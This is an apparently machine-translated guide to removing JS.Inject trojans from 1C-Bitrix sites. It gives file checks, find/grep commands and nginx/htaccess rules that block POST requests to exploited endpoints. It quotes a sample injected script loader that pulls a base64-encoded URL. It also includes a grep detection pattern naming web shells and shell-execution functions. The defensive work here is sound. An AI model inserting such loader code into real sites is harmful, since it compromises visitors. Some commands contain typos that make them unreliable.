Fighting Trojans like JS.Inject
The last notes
All English-language materials have been translated fully automatically using the Google service
The code and description of the fight against trojans are provided as is. You use them at your own risk
Before scanning for viruses, you need to:
1. Change access to admin, ftp\ssh, hosting
2. Make sure that the computer on which the treatment is being performed is not infected, for which you should scan the computer for viruses
3. Make a full backup of the site both through the admin panel and through the hosting control panel
4. Use solution from 1C-Bitrix to search for Trojans
5. Contact those. hosting support with a request to check the site with an antivirus. Sometimes these services are free, sometimes they cost symbolic money. Don't miss this opportunity
If you decide to find the virus yourself, then in most cases you need to:
Scroll through the bitrix\js\main\core\core.js
file to the very bottom and make sure that before or after the line //# sourceMappingURL=core.js.map
(~18459) there is no weird or obscure code. You may see something like:
\bs=document.createElement(`script`);s.src=atob(`ENCODED_STRING`);document.head.appendChild(s);
View the bitrix\modules\main\include\prolog.php
file for unwanted code inserts or simply replace the file with a fresh one. The current file at the time of publication of the material looks like this:
<?
require_once(dirname(__FILE__)."/../bx_root.php");
if (file_exists($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/html_pages/.enabled"))
{
require_once(dirname(__FILE__)."/../lib/composite/responder.php");
Bitrix\Main\Composite\Responder::respond();
}
require_once(dirname(__FILE__)."/prolog_before.php");
require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_after.php");
Scan folders and files by last modified date
This is the most effective method if you know the file structure and date of infection well. You need to enter the command in the SSH
or hosting console (if it allows it). In this case, the command looks for all changed files in the last 3 days
find . –name '*.ph*' -mtime -3
Content search for malicious code
find ./ -type f -name "*.php" -exec grep -i -H "wso shell\|Backdoor\|Shell\|base64_decode\|str_rot13\|gzuncompress\|gzinflate\|strrev\|killall\|navigator.userAgent.match\|mysql_safe\|UdpFlood\|40,101,115,110,98,114,105,110\|msg=@gzinflate\|sql2_safe\|NlOThmMjgyODM0NjkyODdiYT\|6POkiojiO7iY3ns1rn8\|var vst = String.fromCharCode\|c999sh\|request12.php\|auth_pass\|shell_exec\|FilesMan\|passthru\|system\|passwd\|mkdir\|chmod\|mkdir\|md5=\|e2aa4e\|file_get_contents\|eval\|stripslashes\|fsockopen\|pfsockopen\|base64_files" {} \;
or without find
grep -R -i -H -E "wso shell|Backdoor|Shell|base64_decode|str_rot13|gzuncompress|gzinflate|strrev|killall|navigator.userAgent.match|mysql_safe|UdpFlood|40,101,115,110,98,114,105,110|msg=@gzinflate|sql2_safe|NlOThmMjgyODM0NjkyODdiYT|6POkiojiO7iY3ns1rn8|var vst = String.fromCharCode|c999sh|request12.php|auth_pass|shell_exec|FilesMan|passthru|system|passwd|mkdir|chmod|md5=|e2aa4e|file_get_contents|eval|stripslashes|fsockopen|pfsockopen|base64_files" ./
Checking the database for inserts
In the phpmyadmin
database control panel, look for the following entries one by one:
<script , <? , <?php , <iframe
In case of infection through the Bitrix module vote
It is required to prohibit POST
requests to the following Bitrix system files
/bitrix/tools/upload.php
/bitrix/tools/mail_entry.php
/bitrix/modules/main/include/virtual_file_system.php
/bitrix/components/bitrix/sender.mail.editor/ajax.php
/bitrix/tools/vote/uf.php
/bitrix/tools/html_editor_action.php
/bitrix/admin/site_checker.php
1. Manual editing of files. Add before required
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
header("Status: 404 Not Found");
die();
}
2. Ban via nginx
# breaks uploading files to IB
location /bitrix/tools/upload.php {
if ($request_method = POST ) {
deny all;
}
}
location /bitrix/tools/mail_entry.php {
if ($request_method = POST ) {
deny all;
}
}
location /bitrix/tools/vote/uf.php {
if ($request_method = POST ) {
deny all;
}
}
location /bitrix/tools/html_editor_action.php {
if ($request_method = POST ) {
deny all;
}
}
location /bitrix/admin/site_checker.php {
if ($request_method = POST ) {
deny all;
}
}
3. Via htaccess
. We need a construction of the form:
<Files ~ "^(имя файлов)\.php$>
deny from all
</Files>
For /bitrix/tools/:
<Files ~ "^(html_editor_action|mail_entry|upload)\.php$>
deny from all
</Files>
For /bitrix/tools/vote/:
<Files ~ "^(uf)\.php$>
deny from all
</Files>
For /bitrix/modules/main/include/:
<Files ~ "^(virtual_file_system)\.php$>
deny from all
</Files>
For /bitrix/components/bitrix/sender.mail.editor/:
<Files ~ "^(ajax)\.php$>
deny from all
</Files>
For /bitrix/admin/:
<Files ~ "^(site_checker)\.php$>
deny from all
</Files>
It is recommended to use the solution only for the duration of the attacks, as part of the admin panel functionality will be unavailable. A more preferable solution is to update Bitrix to the current version or get rid of the vote
This solution is described here: Mass hacking of sites on 1C-Bitrix. How to protect yourself?
If viruses are detected, I strongly recommend contacting cybersecurity specialists (not me)
Comments